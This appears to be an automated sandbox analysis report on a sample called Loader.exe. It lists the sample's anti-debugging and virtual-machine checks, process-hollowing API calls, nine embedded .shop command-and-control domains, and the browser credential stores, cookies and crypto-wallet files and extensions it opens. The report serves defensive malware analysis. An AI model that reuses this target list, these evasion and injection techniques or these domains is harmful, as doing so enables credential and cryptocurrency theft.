                Source: Loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: Loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00D39DAA push ecx; ret 0_2_00D39DBD
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00448196 push ss; iretd 2_2_0044819A
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00447A4C pushad ; iretd 2_2_00447BA3
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00447AB3 pushad ; iretd 2_2_00447BA3
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00447B2D pushad ; iretd 2_2_00447BA3
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004473B9 push ebp; retf 2_2_004473BA
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00444CA1 push ss; retf 2_2_00444CA2
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0043BF20 push eax; mov dword ptr [esp], EAEBF4F5h2_2_0043BF2E
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0043EFB0 push eax; mov dword ptr [esp], 69686F3Eh2_2_0043EFB4
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00D39DAA push ecx; ret 2_2_00D39DBD
                Source: C:\Users\user\Desktop\Loader.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\Loader.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\Loader.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeWindow / User API: threadDelayed 7125Jump to behavior
                Source: C:\Users\user\Desktop\Loader.exe TID: 1508Thread sleep time: -150000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Loader.exe TID: 4960Thread sleep count: 7125 > 30Jump to behavior
                Source: C:\Users\user\Desktop\Loader.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\Loader.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Loader.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00D4B6E8 FindFirstFileExW,0_2_00D4B6E8
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00D4B799 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00D4B799
                Source: Loader.exe, 00000002.00000003.1729657655.0000000003035000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1689482955.0000000003035000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2921671681.0000000003035000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2921671681.0000000002FFC000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1751671802.0000000003035000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1745521965.0000000003035000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1729956527.0000000003035000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1768446656.0000000003035000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: C:\Users\user\Desktop\Loader.exeAPI call chain: ExitProcess graph end nodegraph_2-30315
                Source: C:\Users\user\Desktop\Loader.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0043D760 LdrInitializeThunk,2_2_0043D760
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00D39A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D39A73
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00D6019E mov edi, dword ptr fs:[00000030h]0_2_00D6019E
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00D31BA0 mov edi, dword ptr fs:[00000030h]0_2_00D31BA0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00D31BA0 mov edi, dword ptr fs:[00000030h]2_2_00D31BA0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00D47020 GetProcessHeap,0_2_00D47020
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00D39A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D39A73
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00D41A60 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D41A60
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00D39A67 SetUnhandledExceptionFilter,0_2_00D39A67
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00D396B3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00D396B3
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00D39A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00D39A73
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00D41A60 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00D41A60
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00D39A67 SetUnhandledExceptionFilter,2_2_00D39A67
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00D396B3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00D396B3

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00D6019E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_00D6019E
                Source: C:\Users\user\Desktop\Loader.exeMemory written: C:\Users\user\Desktop\Loader.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: Loader.exe, 00000000.00000002.1666099805.00000000006C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: cloudewahsj.shop
                Source: Loader.exe, 00000000.00000002.1666099805.00000000006C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: rabidcowse.shop
                Source: Loader.exe, 00000000.00000002.1666099805.00000000006C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: noisycuttej.shop
                Source: Loader.exe, 00000000.00000002.1666099805.00000000006C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: tirepublicerj.shop
                Source: Loader.exe, 00000000.00000002.1666099805.00000000006C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: framekgirus.shop
                Source: Loader.exe, 00000000.00000002.1666099805.00000000006C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: wholersorie.shop
                Source: Loader.exe, 00000000.00000002.1666099805.00000000006C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: abruptyopsn.shop
                Source: Loader.exe, 00000000.00000002.1666099805.00000000006C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: nearycrepso.shop
                Source: Loader.exe, 00000000.00000002.1666099805.00000000006C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: fancywaxxers.shop
                Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,0_2_00D4B0C5
                Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,0_2_00D468FD
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00D4B1B7
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,0_2_00D4B110
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,0_2_00D4B2BD
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00D4AA37
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,0_2_00D463F5
                Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,0_2_00D4AC88
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00D4AD30
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,0_2_00D4AFF0
                Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,0_2_00D4AF83
                Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,2_2_00D4B0C5
                Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,2_2_00D468FD
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_00D4B1B7
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,2_2_00D4B110
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,2_2_00D4B2BD
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,2_2_00D4AA37
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,2_2_00D463F5
                Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,2_2_00D4AC88
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,2_2_00D4AD30
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,2_2_00D4AFF0
                Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,2_2_00D4AF83
                Source: C:\Users\user\Desktop\Loader.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00D3A335 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00D3A335
                Source: C:\Users\user\Desktop\Loader.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Loader.exe, 00000002.00000003.2380587383.0000000005291000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1745461438.0000000005291000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1745313659.000000000528B000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1745521965.0000000003035000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2380230450.000000000528E000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1768402019.0000000005291000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1751977720.000000000528B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\Loader.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Process Memory Space: Loader.exe PID: 2588, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: Loader.exe, 00000002.00000003.1729568333.0000000003065000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
                Source: Loader.exe, 00000002.00000003.1729568333.0000000003065000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                Source: Loader.exe, 00000002.00000003.1729568333.0000000003065000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: Loader.exe, 00000002.00000003.1729657655.0000000003035000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
                Source: Loader.exe, 00000002.00000003.1729568333.0000000003065000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: Loader.exe, 00000002.00000003.1729568333.0000000003065000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: Loader.exe, 00000002.00000003.1729568333.0000000003065000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
                Source: Loader.exe, 00000002.00000003.1729568333.000000000300A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: Loader.exe, 00000002.00000003.1729568333.000000000302A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
